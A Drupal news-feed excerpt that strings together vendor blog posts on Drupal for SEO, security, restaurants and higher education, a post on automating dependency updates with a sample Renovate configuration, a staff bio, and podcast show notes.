Drupal's SEO prowess extends through modules such as SEO checklist, XML Sitemap, Global Redirect, SEO compliance checker, and Pathauto. The Metatag module stands out, enabling the effortless addition of meta tags to enhance SEO. Notably, it allows control over content appearance on social media channels, adding an extra layer of SEO value.

Intuitive Taxonomy System:

Drupal's flexible taxonomy system simplifies content organization using keywords. This not only aids in organizing information thematically but also ensures user-friendly navigation through search terms.

Unmatched Security


Being an open-source CMS platform, Drupal's codebase is always closely scrutinized. As the code powered by Drupal is freely available to everyone for review, use, modification, as well as contribution, it's imperative to ensure that the code is top-notch. Since there are millions of people contributing to this code, it is invigilated by a large number of eyes worldwide which leads to optimum security.

In the case of using a closed source CMS platform, there is no clarity about the potential security flaws present within the software. Due to its ability to handle extremely crucial data, Drupal has been a preferred CMS for web applications that are created for government, leading financial institutions, and popular e-commerce brands.

Why is Drupal so secure?

To give your web application a high level of security, Drupal comes with a list of various security modules that include: 

Drupal Login Security – This module enables the administrator to impose several restrictions on user login. Before blocking an account, it can restrict the total number of invalid login attempts made. Also, it allows administrators to deny access to specific IP addresses. 

Two-factor Authentication – Leveraging this security module by Drupal, you can get a dual-layer of authentication after a user logs in to your application with a specific user ID and password. This involves entering a code received on their email or mobile phone. 

Password Policy – This module by Drupal plays a key role in making your login forms more secure, thereby keeping bots and possible security breaches at bay. It enforces various restrictions at the time of password setting, such as constraints on the character type, length, case included (uppercase/lowercase), etc. Also, it comes with a password expiration feature that asks users to regularly change their passwords.

Content Access – This module allows you to gain access control to the content in a detailed manner. By specifying the content types with a view, edit, or delete permissions, you can manage them on the basis of role and author.

Coder – If there are any loopholes in your code, an attacker is likely to steal your information. By using the Coder module, your Drupal code is properly scrutinized to uncover the areas where the coding practices aren't followed properly.

Read more about the different security modules powered by Drupal.

Uncovering the flow of Drupal

Before considering Drupal to build your web application, it's essential to take a sneak peek into the system's layers between which the information is passed. Drupal comes with a set of 5 layers, namely: 
 

Uncovering the flow of Drupal

Data (Nodes, etc.)

At the foundation lies the data layer, encompassing all nodes and serving as the data pool where information is input before display.

Modules

The second layer in the Drupal flow is modules. Modules can be defined as the functional plugins that are built on the core functionality of Drupal. They can either be a component of the Drupal core (when shipped with Drupal) or contributed items that are specially developed by Drupal community members. These modules enable you to seamlessly customize the data items on your specific node types, create e-commerce from scratch, sort and display the required content programmatically, and more. There is a myriad of options in the continuously evolving repository of the Drupal modules that indicate innovation as well as the collaborative effort of the community members. 

Blocks & Menus

The next layer in the Drupal flow comprises blocks and menus. Blocks are used for gaining output from a particular module and are mainly created to represent anything you want. These blocks can be placed in several spots (called regions) inside the template layout that you use and can be effortlessly configured to output in different ways. Menus are used for navigation in Drupal that help to define the content that comes in each respective menu path (i.e. the relative URL). These play a crucial role in providing links to all the different pages that have been created in Drupal. 

User Permissions 

In this stage, the settings are configured to control what different users can see and are allowed to do. These permissions are usually defined on the basis of specific roles due to which different users are granted different defined permissions. 

Template 

This layer involves the site theme and is mainly made up of XHTML and CSS. Due to the intermixing of the Twig variables, the content generated in Drupal can easily go into the relevant spots. With each theme, there's a defined set of functions used for overriding the standard ones in the listed modules. This helps to gain full control over how different modules create their markups during the output.  

Conclusion

Drupal's search engine friendliness, unmatched security features, and layered flow make it an unparalleled choice for web application development. As the digital soul of the brand, your web application deserves the modular excellence and robust configurations that Drupal offers. If you are seeking exceptional web applications, connect with Axelerant's experts to learn more.

Dec 05 2023
Dec 05

Michael E. Meyers joined Tag1 Consulting as Managing Director in 2017 after a decade of working with the team on many projects.

Prior to joining Tag1, Michael was VP of Developer Relations at Acquia, responsible for developer marketing & events, developer relations, and helped launch the developer products group. Michael co-founded & was CTO of NowPublic.com, the first venture-backed Drupal based startup that pioneered citizen journalism. With the help of Tag1, he grew NowPublic into a top 500 website. As CTO of The Clarity Digital Group, which acquired NowPublic, Michael and the Tag1 team rebuilt Examiner.com, the first Drupal-based top 100 Internet site, and the leading contributor to Drupal 7.

Michael has made major contributions to and helped establish Drupal as one of the most successful open source platforms; He’s an advisor to the Drupal Association board and several startup companies.

Dec 05 2023
Dec 05

Introduction

The restaurant industry has been going through a rough patch, with the economy taking a nosedive. Recovery from this issue is possible through business agility, and 71% of food businesses accept digital transformation as a crucial factor in accomplishing that goal.

However, as more restaurants join the online space, the need for a Restaurant CMS becomes more prominent. The right Restaurant website CMS, like Drupal, can help businesses streamline their function.

Why Drupal Is The Right Restaurant CMS

With over 20 years of experience in restaurant content management, Drupal has been the go-to site for several large companies and restaurants. Around 89.2% of the users believe Drupal will gain more popularity among enterprises in the next three years, irrespective of industry. This means the need for a Sports CMS and an Education CMS will also increase. 

The Content Management System industry has been exploding. But Drupal stays on top of the ladder for many reasons, including its efficient and highly responsive websites, fluid designs with high resolutions, and easy adaptability. 

According to statistics,

Drupal Usage in world

Drupal explores the restaurant content management system with the market's future needs. Restaurants prosper when connected with this platform as it allows them to communicate with regular customers, give additional coupons on reservations, help with email newsletters, and enable digital menu management.

These key features are essential in today's market to stay connected with customers, build a loyal community, and further expand online visibility. Investing in Drupal development is pivotal in adding brand value to restaurants. 

Drupal is also easily accessible to all users. The Point of Sale (POS) system is designed to add value and brand name to the restaurant craftily. It is also highly functional on MAC OS, Windows, and Linux.

Restaurant POS

Drupal provides an integral POS system that can help a restaurant enhance its brand value and visibility by allowing it to:

  • Track Order: With Drupal's efficient means, tracking orders and increasing the restaurant's efficiency is easier.
  • Manage Menus: In a digital world, menu management for restaurants has become easier due to the shift to digital menus. With Drupal’s effective CMS, one can easily manage menus regularly. 
  • Easy Bill Payment: No customer has the time and energy to wait to pay the bill. Drupal allows restaurants to have a digital, easy, and fast mode of bill payment. This builds trust and gives scope for growth.
  • Multi-Device Accessibility: Drupal connects restaurants with all customers through an efficient website and features.

A Short Tale: Deploying A Decoupled Drupal Platform For A Luxury Resort Chain

A popular chain of luxury resorts known for providing entertainment and casino facilities in Asia and Europe needed a unified content management platform. The organization wanted to ensure consistency across all brands.

With a plethora of content scattered across different websites, they faced issues related to disparate web tools, inconsistent branding, and poor user experience. Read how Axelerant helped them simplify content management, deliver modern user experiences, and expand their market presence with a decoupled Drupal platform.

Factors That Make Drupal An Ideal Restaurant CMS

Drupal has many factors that make it the best CMS for a restaurant website, including:

Security Management

In restaurant websites, customer data is safely secured on the local cloud to ensure customers' data safety and privacy. Tight control is kept on bill payments, card information, and personal details. This builds trust with customers. 

Multi-Lingual Support

Restaurants are places for people to blend in, experience the local culture, and feel connected. Through the multi-lingual support of Drupal, the experience for every part of the restaurant becomes simple, connective, and efficient.

Analytics

Deep analytics lets one quickly understand the customers' and markets' needs. It gives the user an understanding of the competition, insight into what is working for its customers, and how the business can strive to grow further.

Personalization

One can quickly create an interactive website with various themes and widgets that allow personalization. This feature helps the website get in sync with the overall feel of the dining experience. This goes a long way in providing customers with a memorable experience and building brand value.

Testing And Experimentation

Drupal CMS is intuitive and has endless creative possibilities due to automated testing and experimentation options. The CMS helps build a platform quickly, check, test, and ensure the website's proper functioning.

Scalability

Drupal has been the leading content management system for over two decades. Every eatery's needs are met with scalable websites hosted by Drupal, from exclusive restaurants to high-class bars to up-and-coming cafes.

While alternatives specializing in CMS are available, the general Drupal CMS helps build a site that suits the market and customer needs effortlessly without incurring the high expenses of a developer.

Exceptional Services

With a wide array of options in Drupal, businesses can create a website that becomes the go-to place for their creative presence online. Drupal makes it easy to introduce features, like QR ordering, online ordering, and recipe management, that help deliver exceptional customer service.

Essential Features To Include In A Restaurant CMS

Every Restaurant CMS should have a few essential features like:

Mobile-Friendly Design

Almost everyone is a smartphone user and finds it the most convenient means to look for information. This is why restaurants need to have mobile-friendly sites. Accelerated mobile pages help attract the target audience and keep them hooked to the site with its high usability and convenience.

Accurate Information

A highly efficient website should be based on authenticity and cultural value. This builds a sense of customer reliance and allows them to explore a site further with trust. It also allows customers to connect with the core values of an organization.

Page Speed Insights

With page speed insights, one can understand how long it takes for a page to load, how it works overall, and what its efficiency is . This, in turn, provides insight into how user-friendly the website is. With Drupal, this is a crucial feature that allows restaurants to keep their customer base intact.

Email Retargeting

First-time customers are a great source of business if converted to regular customers. Email retargeting allows a restaurant to reconnect with first-time customers and keep them hooked to the brand. This is a great way to expand the business and create a name in the local and overall niche market.

Drupal Features

The Conclusion

Drupal has been and aims to stay a go-to CMS and help restaurants get the online presence they need to become the next big thing. From one-time customers to regular ones, conversion is a small step.

Shifting to Drupal CMS can allow a restaurant's staff to connect effectively and work while maintaining strong relationships with customers. Opt for a Drupal development service if you want to make this happen.

The experts at Axelerant excel at elevating the online presence of restaurants. Get in touch to know how they can help you.

Dec 05 2023
Dec 05

 

Selecting the right Education Content Management System (CMS) for your institution is a critical decision in the current digital landscape.

As universities adapt to the "new normal" of a digital-first era, the impact of COVID-19 on higher education has been unprecedented, leading to uncertainties about the upcoming semesters globally.

In response to this digital paradigm shift, leaders in higher education are proactively preparing for the future.

“Not everybody's going to survive, for people who are forward-thinking, fast-pivoting, opportunistic visionaries, this is a really exciting time to be in higher ed. But it's also quite scary because 20% of colleges aren't going to make it.”

- Dr. Nancy Hubbard, University of Lynchburg

The central question arises: What is the most crucial aspect to get right in this digital evolution? The answer is your website. Serving as the online identity of your institution, the website is the platform that attracts, engages, and delights prospective students, shaping their seamless experience.

Outdated and lackluster education websites have a direct impact on the reputation of universities among prospective students, parents, and potential hires. This, in turn, affects enrollment rates, potentially leading to a significant loss of revenue, estimated at up to $19 billion collectively.

Education Content Management System

Achieving a seamless online experience hinges on the choice of an integrable Education Content Management System (CMS). In higher education, these CMSs go beyond supporting digital marketing or communications; they serve as central tools for staff, faculty, students, and others. Modern login portals must surpass the functionality of past systems like "angel systems" or "blackboard systems."

Choosing the right Education Content Management System can be daunting, given the myriad tasks prospects want to perform.

NYC Design research on 3,360 higher ed websites, including prestigious institutions like Stanford University, University of British Columbia, UC Berkeley, University of Michigan, and Cornell University, reveals that 90% of these sites are built using twelve education Content Management Systems.

Top education content management systems used by education institutes

Among these CMSs, WordPress and Drupal emerge as leaders, capturing 40.8% and 19.1% shares, respectively, as of 2023. The choice between WordPress and Drupal depends on the institution's type and specific needs. While WordPress is popular for its user-friendly interface and affordability, Drupal dominates among larger, more premium universities with complex requirements.

For instance, the top five US universities, including Harvard University, Stanford University, Massachusetts Institute of Technology (MIT), University of California, Berkeley (UCB), and the University of California, Los Angeles, have chosen Drupal development services. This preference reinforces Drupal's status as the preferred CMS for larger institutions seeking a robust platform to meet their diverse and complex needs.

Princeton, Stanford, University of East London, University of Dundee — the world’s top schools build better .edu sites and create great digital experiences with Drupal. Today, Drupal is the most widely used content management system in higher education, with 71% of the top 100 universities relying on the open source content management system to drive their digital strategy.

Should I Choose an Open Source Education Content Management System in 2024?

Do you wish to control the destiny of your website and deliver an orchestrated experience to your students and faculty? As quoted by Linus Torvalds:

“In real Open Source, you have the right to control your own destiny.”

Controlling the destiny of your institution's website and delivering an orchestrated experience to students and faculty is a crucial decision, echoing the words of Linus Torvalds: "In real open source, you have the right to control your own destiny." With approximately 60% of university websites built on an open-source CMS, opting for this approach becomes the optimal choice for higher-ed tech leaders in shaping their university or college platform.

An open-source education content management system seamlessly ties together services, data, and content across any tech stack. This integration facilitates the delivery of orchestrated digital experiences across channels in an agile manner, leading to a transformation that enhances the flexibility and resilience of institutions in the long term.

What Is An Open Source Education Content Management System?

An open-source website employs open-source software (OSS), allowing anyone to inspect, modify, and enhance the source code. Notably, Drupal stands out as one of the most popular open-source content management systems for higher education institutions. Marketers, developers, and CxOs in higher education can effortlessly connect with open-source community groups globally, engaging in platforms such as Drupal camps and conferences, where IT professionals from academic institutions actively contribute.

How Anne Margulies contribute to Drupal community

Reasons To Use An Open Source Education CMS

In a fast-paced digital landscape marked by technological growth and transformation, the success of a digital strategy hinges on agility, scalability, accountability, and flexibility. While proprietary technology has its benefits, the guarded secrecy of its source code contrasts with the transparency essential in education. Open-source CMS emerges as a superior option for university websites.

Key reasons for universities to embrace Open Source Education Content Management Systems include:

  • Large Developer Communities: Tap into collaborative knowledge and support from a vast community.
  • Widely Adopted: Open Source CMSs like Drupal are widely embraced in the education sector.
  • Ease in Academic Publishing: Facilitate seamless academic content publication and management.
  • High Security: Prioritize security, a critical aspect for educational institutions.
  • Affordability: Open Source solutions offer cost-effective alternatives to proprietary technologies.
There are a considerable number of Open Source education Content Management Systems available in the market. Which one should you choose, and what factors should you consider while selecting the right higher ed Content Management System? 

This CMS Evaluation Framework may help you to make an informed decision.

Reasons To Choose Drupal as Your Higher Ed Content Management System

Amid the impact of COVID-19 on students' willingness to enroll, it is imperative to revolutionize the student experience, affirm their decisions, and provide a personalized engagement journey from enrollment to graduation. Campus activities, including tours, living arrangements, and dorm life, remain uncertain, leading to a significant decline in campus visit requests.

Students unwillingness to join back colleges as per report

We have to keep in mind that campus tours, campus living, dorm life, etc. are still uncertain in the coming semester.

36% of institutions are experiencing a steep decline in campus visit requests and the number of campus tours are further expected to drop

Just like businesses offering work-from-home or flexible arrangements, it’s likely institutions of higher ed will have to do this in light of any negative C19 developments (of which, delta is one.) 

What does this mean? 

The campus tour is less powerful than it used to be—it’s more complicated and subject to devaluation. What isn’t for sure is the importance of your digital platform, the site that represents the institution. The portal. The entire UX. What about this tour or walkthrough? It just became more important. Perhaps even more important than the “campus tour.”

In this era where students may interact more with.edu than their physical classrooms, the importance of the institution's website has surged. A powerful and flexible open-source education content management system is the answer, with Drupal standing out as the choice for 70% of the top higher education institutions' websites.

Drupal's adaptability and flexibility position it as a reliable CMS option, aligning seamlessly with the evolving needs of higher education in 2023.

1.  Marketing

To overview how a student's journey on a university website begins when they search to enroll in an online program:

  • They start online research for their desired program
  • They shortlist a few university websites 
  • They complete filling the first application form

2/3rd of students often complete step (c) within just four weeks of starting online research. It implies that universities have four weeks to move at par with the prospective student's decision-making speed and offer them a personalized experience to engage.

And here, marketing offerings, at speed and scale, in a personalized manner play an important role. Thus, big higher ed players spend on marketing heavily to increase the online enrollment rate, which is evident from the following analysis.

The CMO Survey conducted by Duke University highlights that amongst the 15 industry sectors, the use of Digital Marketing, with a mean degree of 6.20, has contributed the most in the education sector. Unsurprisingly, the more a university spends on marketing initiatives, the higher is the enrollment rate.

A report mentioning higher spending on marketing leads to higher enrolment

The Digital Marketing ecosystem includes all the digital channels an institution uses to communicate with its prospective students, nurture them till they are ready to enroll, convert them and promote new enrolments from actual students. 

To make their Digital Marketing initiatives a success, higher ed marketers do need data about geolocation, prospect demographics, and previous history. However, they also need data about what their prospective students are doing and looking for right now.

Unfortunately, in most institutions, this type of data resides in silos and the technology that could orchestrate this prospect journey is not connected effectively to the martech stack.

“There is a lot of data out there, the key is to learn how to leverage that data to provide the best experience for your prospective audience.”

- Luci Geraci, Executive Director, Web & Digital Marketing, Council on International Educational Exchange

Drupal is a powerful answer to this challenge. Being an Open Source education content management system, Drupal is easily integrable with existing systems using open APIs that allow student data to flow seamlessly throughout the institution. Also, Drupal-based digital properties allow higher ed marketers to collect key prospect data that help them to design a comprehensive view of prospects.

Drupal education content management system integrations

With Drupal marketing, higher ed markets can:

  • Get a 360-degree view of prospects
  • Streamline campaign management
  • Connect systems and data sources with open APIs
  • Build memorable experiences across platforms with multi-channel reach
  • Deliver global experiences in any language, with multilingual functionality

As a robust Higher Ed Content Management solution, Drupal is behind many of the digital experiences that are part of the marketing efforts of leading universities. There are several Drupal marketing modules created by the Drupal community that can be used with Drupal sites to help with marketing initiatives. Some of the top Drupal Digital Marketing modules are as follows:

  • Webform: It is an essential building block that integrates Drupal and other third-party marketing automation software.

    MicroAssist Inc., an Austin-based technology training and consulting company, relaunched its website on Drupal and added a Webform module to their website. Their marketing time was super-excited with the ability of Webform to quickly and effectively build different types of forms.
     

  • Mautic: Mautic allows for multi-channel communications and campaign management, content customization, email marketing, visitor tracking, and personalization, to name a few. 

    Mautic is an Open Source marketing automation platform acquired by Acquia. The community version of Mautic lacked the ready-to-use plugins required by the Acquia marketing team. They collaborated with Axelerant to develop Mautic plugins to extend functionality.

A case study on how Axelerant helped Acquia to migrate from Marketo to Mautic

  • Google Analytics: The Google Analytics Drupal module allows marketers to add a web statistics tracking system to the website. It helps track and monitor search systems, Adsense, custom code snippets, and much more.
     
  • HubSpot: The HubSpot Drupal module integrates seamlessly with Webform and the HubSpot API. The entered information of a user on Drupal Webform is sent to HubSpot’s lead management tool, which is further tracked and nurtured.
     
  • Search API Solr: The Search API Solr Drupal module helps configure Solr search on a Drupal website. It works in collaboration with the Search API module, for which it provides an Apache Solr backend.

2. Accessibility

Education should be available to all, irrespective of caste, creed, gender, or native language. But the challenge is how to make it fully accessible - 71% of users with a disability leave a website that is not accessible to them.

“So if a college education is indispensable, the challenge as I see it is how to make it more accessible.”

- Gordon Gee

In 2016, a visually impaired student's lawsuit against Miami University underscored the critical importance of web accessibility. The university, faced with inaccessible websites, had to pay $25,000 in compensation and overhaul its web content to meet federal accessibility standards. Such incidents highlight the ethical responsibility of universities to ensure equal access to educational resources.

The exploration of ethical practices by students during the university selection process reveals a growing awareness of accessibility issues. Lawsuits against universities failing in this regard indicate a need for institutions to prioritize ethical responsibilities.

However, auditing websites for accessibility is a complex and resource-intensive task. Scott Lissner, Americans With Disabilities Act compliance officer at Ohio State University, humorously captures the enormity of the challenge, stating that the number of webpages at Ohio State is "somewhere between five and eight million, depending on what definition you're using and what moment in time it is."

Enter Drupal, a comprehensive education content management system (CMS) designed to meet the demands of the digital ecosystem while adhering to accessibility standards. Drupal's commitment to accessibility is evident through features designed to enhance user experiences for people with disabilities:

  • Accessible inline forms:
    • Challenge: Visually impaired users may struggle with error notifications on form submissions.
    • Solution: Drupal introduced the Inline Form Errors module, aiding visually impaired users in identifying errors by providing alternative formats for error notifications. 
  • Anyone can easily add alt text and tags: 
    • Challenge: Embedded images on websites may lack accessibility for visually impaired audiences.
    • Solution: Drupal mandates alt text (alternative text) for images, ensuring that meaningful descriptions accompany images, making them accessible to all users.
How Drupal CMS takes care of the accessbility by mkaing sure you add an alt text to the image
  • Seamless management of tabs: 
    • Challenge: Non-visual and non-mouse users face difficulties navigating webpage elements.
    • Solution: Drupal's TabbingManager, a JavaScript feature, allows logical access to critical page elements. Higher ed marketers can precisely control the tabbing sequence, enhancing the experience for users who rely on keyboard navigation.
The education content management system of University of Arizona helps them build website with accessbility features.jpg

In essence, Drupal not only acknowledges the significance of accessibility but actively integrates features that contribute to a more inclusive digital environment. By choosing Drupal as the CMS, education institutions align themselves with a commitment to providing accessible and equitable educational opportunities for all 

3. Personalization

In the digital age, students expect a personalized online experience akin to that of industry giants like Amazon and Netflix—seamless, orchestrated, relevant, and immediate. Recognizing this, 70% of higher education leaders consider digital engagement and websites as paramount marketing tools to attract, engage, and convert prospective students.

A student-centric engagement platform strives to deliver a highly personalized experience both before and after enrollment. For instance, Arizona State University (ASU) and Southern New Hampshire University (SNHU) leverage predictive analytics to identify academically struggling students and provide timely interventions. These personalized experiences foster lasting engagement among modern learners.

Drupal has adeptly seized this opportunity to provide 360-degree digital experiences that are not only relevant and immediate but also personalized. Leveraging browser history, geolocation, behavior taxonomies, and device type, Drupal enables users to capture user interactions at every touchpoint. This information allows for the curation of a comprehensive vision of personalized offerings, ultimately enhancing retention and online enrollment rates.

An exemplary instance is the Stanford University website, which harnesses Drupal to empower campus members to effortlessly design, build, grow, and manage brand-standard sites. These sites are tailored to individual needs, all while prioritizing security.

4. Security 

Security is a paramount concern for higher education decision-makers, given the frequent targeting of college websites. In this context, the choice of a digital platform becomes crucial. Open source software (OSS) is generally considered more secure than proprietary software, and Drupal stands out in this regard.

Ghaphic

Drupal's security team is highly responsive and proactive, consistently monitoring vulnerabilities and issuing frequent security fixes for all actively maintained versions. The team follows a "coordinated disclosure policy," maintaining issue privacy until a fix is published. The Drupal Security Team's thoughtful communication ensures that users are well-informed and can take necessary actions.

“The Drupal Security Team follows a "coordinated disclosure policy": issues remain private until there is a published fix. A public announcement is made when the threat has been addressed and a secure version of Drupal core is also available. Even when a bug fix is made available, the Drupal Security Team is very thoughtful with its communication.”

- Dries Buytaert, Drupal Founder

Over the years, Drupal has demonstrated its resilience against critical security vulnerabilities, including those identified by OWASP in their top 10 security risks. The decrease in vulnerabilities from 2002 to 2021 attests to Drupal's commitment to providing a robust and secure education content management system. Frequent minor releases, especially after the introduction of Drupal 8 and 9, underscore Drupal's dedication to continuous innovation and the delivery of secure updates.

 Number of vulnerabilities on Drupal year-by-year

5. Multisite Architecture

In the landscape of higher education, where institutions manage diverse websites serving various functions, Drupal emerges as a robust solution for content management systems (CMS). The built-in multisite functionality of Drupal provides universities and colleges with a versatile toolbox, empowering individual departments to communicate effectively with students, staff, and users through a unified system. This multisite capability not only allows for independence in managing websites but also significantly reduces administrative overhead for IT offices.

When to Multisite and When Not

Sr. No. Factor Consider Multisite Don't Consider Multisite 1 The sites are for the same client and it is to simplify the scope of each site ✓   2 The sites are similar in functionality, use the same modules or use the same Drupal distribution ✓   3 You have limited resources/staffing, but lots of sites to manage and maintain ✓   4 The functionality or scope are different   ✓ 5 You are managing multiple distributions   ✓ 6 The clients are different   ✓

An illustrative example of Drupal's multisite prowess is evident in OpenScholar, a research collaboration platform. OpenScholar's multi-tenant, robust, and modular architecture enables academic institutions to host thousands of websites within a single instance.

Axelerant's collaboration with OpenScholar involved implementing test automation systematically across the entire testing pyramid, contributing to quicker releases. Leveraging Organic Groups and Spaces modules, OpenScholar enables a single Drupal installation to host complete and discrete websites.

The platform supports custom domains, facilitating the seamless transfer of existing websites to OpenScholar, including the management of custom URLs within the site settings area of the control panel.

 

A Quick Tale

Delivering Seamless Digital Experience by Building Scalable Multisites for a Leading Research University

Axelerant's expertise shines in a case study involving a renowned public research university established in the mid-19th century. Facing scalability challenges with multiple websites built on PHP, the university sought Axelerant's assistance.

Read the case study to know how Axelerant leveraged its experience to help the client deliver a world-class user experience, enabling them to build pages with ease.

Read the case study to know how Axelerant built scalable multisites for a leading research university

6. Community Support

The success of the Drupal CMS platform is underlined by its extensive and devoted community. Key Drupal facts highlight the platform's widespread adoption and user satisfaction:

Some key Drupal facts:

Over 1.7 million websites use Drupal
7% of the top 10k websites use Drupal
97% of Drupal users are satisfied with it
46,603 Drupal modules can be downloaded for free
In 2020, Drupal welcomed 8,000 individual contributors and over 1,200 corporate contributors

A pivotal aspect of Drupal's success is its vibrant and inclusive community. Drupalers, drawn to the platform for coding, find a community that becomes a family. Their commitment to strengthening and experience-driving the community is evident in their daily efforts.

“We believe that the Drupal project benefits from a diverse contribution pool, and we strive to foster a welcoming and inclusive culture everywhere Drupal exists — at events, online, and in our workplaces.”

- Drupal’s statement of values

Drupal is a common thread that weaves together Drupalers worldwide, without discrimination, with a single mission: the more you give, the more you get. And Drupalers happily volunteer their time in Drupal communities because it is fun, engaging, challenging, meaningful, and enjoyable.

At Axelerant, we eat, sleep, and breathe Drupal. We always look for different ways to give back to the Drupal community and prepare hard for Drupal events to leave a mark, learn from other Drupalers, implement the learnings, and come back prepared for the next engagement.

Axelerant Drupal community contributions

Even many university CIOs and academic I.T. leaders have evolved and opened up Higher Education by bringing Open Source projects to campus—at times subtly, sometimes hyperactively. This forwards the general mission of every university: to disseminate and expand knowledge and information across communities. Adopting Open Source software allows universities to put more into this mission.

Some community group examples are:

Drupal Group: Higher Education
Drupal Group: Drupal in Education
Drupal Group: Drupal for K-12 Schools
Drupal Group: Higher Education Europe
Drupal Group: Open Data in Education
Drupal Group: ELMS
Drupal Group: LMS (Learning Management System)
Stanford Web Services Blog
Edu Drupal Unconsortium

Wrap Your Website With An Experience-driven Higher Ed CMS Platform: Drupal

In conclusion, Drupal's prowess in multisite architecture, coupled with its vibrant community support, positions it as a premier choice for higher education institutions seeking an experience-driven CMS platform.

In times of crisis, Drupal remains a steadfast partner, guiding the education industry through digital paradigm shifts while upholding the core mission of empowering informed citizens. Drupal's living, breathing digital platform ensures not just engagement but a seamless experience, contributing to its prevalence in over 70% of the top universities as their chosen education content management system.

Dec 04 2023
Dec 04

Manually maintaining a Drupal website is time-consuming, especially for a small team already busy with new features and bug fixes. When the Drupal Security team announces a new security update, this requires one or more members of the development team to:

  1. Stop what they are currently doing
  2. Apply the update and create a new pull request
  3. Test the security update

Add in other non-critical updates, and a development team will spend a significant amount of time on something that, while necessary, doesn't seem to add much value. If you have multiple websites and codebases, this problem becomes even worse. It could easily become someone's full-time job to do nothing but package updates.

Why you should automate these updates

You need to update your codebase. It's nonnegotiable. It keeps your website secure and might even address bugs your team has been working on or bugs they haven't yet identified. But you can make the process much easier without the huge administrative lift every time.

Automating your updates solves a lot of problems. When set up correctly, automation will update each package independently, one pull request at a time, making identifying and fixing regressions easier. If you combine automated updates with end-to-end testing, you will have more confidence that new problems are not being introduced.

One of our support clients has twelve different Drupal repositories (as well as multiple WordPress websites) with an in-house team of three developers and one designer. Doing only security updates on these websites took us 30 hours per month. When the time came to upgrade from Drupal 8 to Drupal 9, there was a large backlog of non-security updates to perform, which slowed down the process.

For each update, the client also did extensive QA testing and scheduled that testing weeks in advance. If they discovered any problems, all other releases would be blocked. It would take another few weeks to review the next round of fixes because of the scheduling, even if it were a one-line change.

Once these updates were automated using Renovate, it was just a matter of keeping up with all the latest changes, improvements, and bug fixes released with minor version updates. With end-to-end and visual regression testing, a developer only needs to be involved when an automated test or build fails. Having Renovate (properly configured) is like having an extra developer on your team.

What is Renovate?

Renovate is a tool for automating the updating of dependencies in software projects. It can scan your software repositories, identify out-of-date packages, create branches, and submit pull requests for each one. Renovate supports a wide range of programming languages and platforms like PHP and NodeJS.

To use Renovate in its basic form:

  • Set Up: Install Renovate from your package manager or the platform-specific distribution.
  • Configuration: Create a configuration file, renovate.json, in the root of your repository. This file dictates how Renovate will behave – which dependencies to update, how often, etc. See the example below.
  • Running: Execute the Renovate tool, which will scan your repository for outdated dependencies based on your configuration.
  • Review & Merge: Renovate creates pull requests (or merge requests) for each dependency update. Review the changes and merge them if everything looks good.

You can leverage many other advanced features and configurations, such as grouping multiple dependency updates into a single PR, scheduling when updates should occur, and more.

Setting Renovate up varies between Git hosting providers. The easiest is GitHub because it's accessible in the GitHub Marketplace.

Are there other options?

We've also tried Violinist.io and Dependabot.

Dependabot's configuration was very limited for our needs, and some features have been removed since being acquired by GitHub. Overall, it's a little harder to work with.

We used Violinist.io on some projects that were not using GitHub. Configuring Dependabot for BitBucket and GitLab takes more work because you must set up custom runners or pipelines. 

Our experience has shown that, over time, Violinist.io has failed to create automated pull requests if/when there are minor issues with composer. Even something like an out-of-date patch, though unrelated to the package it's attempting to update, can halt the entire process. Once it fails, it creates a backlog of pending updates. We haven't had these issues with Renovate because of its flexible configuration.

Our Renovate configuration and preferences

Renovate integration is free, and once it is connected, it will open a pull request for the bare minimum configuration to start looking for package updates. We build upon this base configuration to group some packages together and set up rules around automerging. 

For example, we allow automerging during off-peak hours to avoid rebasing pull requests when others are actively working on the site. We also set branch protection rules that require certain tests to pass before Renovate is allowed to automerge. We only allow minor and patch releases to automerge because we want a developer to review any major version upgrade.

Here's an example of a renovate.json we've been using on our projects.


{
  "$schema": "https://docs.renovatebot.com/renovate-schema.json",
  "extends": ["config:base", "group:symfony"],
  "timezone": "America/New_York",
  "automergeSchedule": ["every weekend"],

  "rebaseWhen": "auto",
  "platform": "github",
  "baseBranches": ["main"],
  "prConcurrentLimit": 2,
  "rangeStrategy": "bump",
  "branchPrefix": "renovate/",
  "automerge": false,
  "packageRules": [
    {
      "matchManagers": ["composer"]
    },
    {
      "matchManagers": ["npm"]
    },
    {
      "matchPackagePrefixes": ["stylelint"],
      "groupName": "Stylelint packages"
    },
    {
      "matchPackageNames": [
        "drupal/core",
        "drupal/core-recommended",
        "drupal/core-composer-scaffold"
      ],
      "groupName": "Drupal Core"
    },
    {
      "matchPackageNames": ["lullabot/drainpipe", "lullabot/drainpipe-dev"],
      "groupName": "Drainpipe"
    },
    {
      "matchPackagePrefixes": ["gulp"],
      "groupName": "Gulp packages"
    },
    {
      "matchPackagePrefixes": ["jquery"],
      "groupName": "jQuery packages"
    }
  ]
}

Conclusion

There is no end to updating packages. Configuring Renovate allows more time and expertise to be spent on improving your website instead of constantly performing maintenance.

Dec 04 2023
Dec 04

On today’s show we are turning the tables and Nic and John will be interviewed by our guest host Melissa Bent. We’ll also cover Content Model Documentation as our module of the week.

For show notes visit:
www.talkingDrupal.com/427

Topics

  • What made you decide to start the podcast
  • Who does what tasks
  • The first episode was on May 30 2013. What do you know now that you wish you knew then
  • When did the guest host start
  • What has been your favorite episode
  • How did you come to this format
  • Where did the tagline come from
  • What technology do you use in production
  • The show is supported by multiple platforms, would you recommend this
  • What advice would you give someone just starting

Resources

Guests

Nic Laflin - nLighteneddevelopment.com nicxvan
John Picozzi - epam.com johnpicozzi

Hosts

Melissa Bent - linkedin.com/in/melissabent merauluka

MOTW

Correspondent

Martin Anderson-Clutz - @mandclu
Content Model & Site Documentation

  • Brief description:
    • Have you wanted to make your Drupal site self-documenting directly within the admin UI? There’s a module for that.
  • Brief history
    • How old: created in Jan 2023
    • Versions available: 1.0.23, compatible with Drupal 9 and 10
  • Maintainership
    • Actively maintained, latest release was a week ago
    • Test coverage
    • No official guide, but there was a recent talk about the module at GovCon, so you can watch that
    • Number of open issues: 43 open, 9 of which are bugs
  • Usage stats:
  • Maintainer(s):
    • Steve Wirt (swirt) who works for Civic Actions
  • Module features and usage
    • Allows your Drupal site to generate its own documentation
    • Has fieldable Content Model Document entities that allow you to customize what data will be stored
    • Can optionally document things like your content types, taxonomies, block types, paragraph types, and more
    • Documentation elements can also be associated with parts of your site configuration, and they become available within the relevant parts of your admin UI. For example, if you add documentation for a specific content type, when a site builder goes into edit that content type they will see a link to the documentation as a tab
    • You can generate entity relationship diagrams using MermaidJS
